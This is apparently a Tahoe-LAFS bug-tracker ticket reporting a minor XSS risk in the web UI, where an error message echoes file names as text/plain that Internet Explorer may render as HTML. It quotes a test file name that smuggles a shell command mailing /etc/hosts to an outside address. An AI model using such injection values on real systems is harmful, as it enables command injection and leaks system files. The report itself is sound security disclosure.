﻿id	summary	reporter	owner	description	type	status	priority	milestone	component	version	resolution	keywords	cc	launchpad_bug
1142	Unlikely XSS Potential in File Names in WUI	chrisp	nobody	"I have a file named ""zumby-bumby ; mail blaggy@mailinator.com < /etc/hosts"" in the pubgrid root (http://pubgrid.tahoe-lafs.org/uri/URI%3ADIR2%3Actmtx2awdo4xt77x5xxaz6nyxm%3An5t546ddvd6xlv4v6se6sjympbdbvo7orwizuzl42urm73sxazqa/).

When you try to rename it, you get the message:

""No such child: zumby-bumby ; mail blaggy@mailinator.com < /etc/hosts""

served as text/plain. IE will render text/plain as HTML if it detects HTML in the plain text. Pathetic, but true. To attack this, the attacker would have to convince the user to add a maliciously-named file to their directory, so it's more social engineering than automatable attack, but still."	defect	new	major	undecided	code-frontend-web	1.7.1		security xss html names wui		
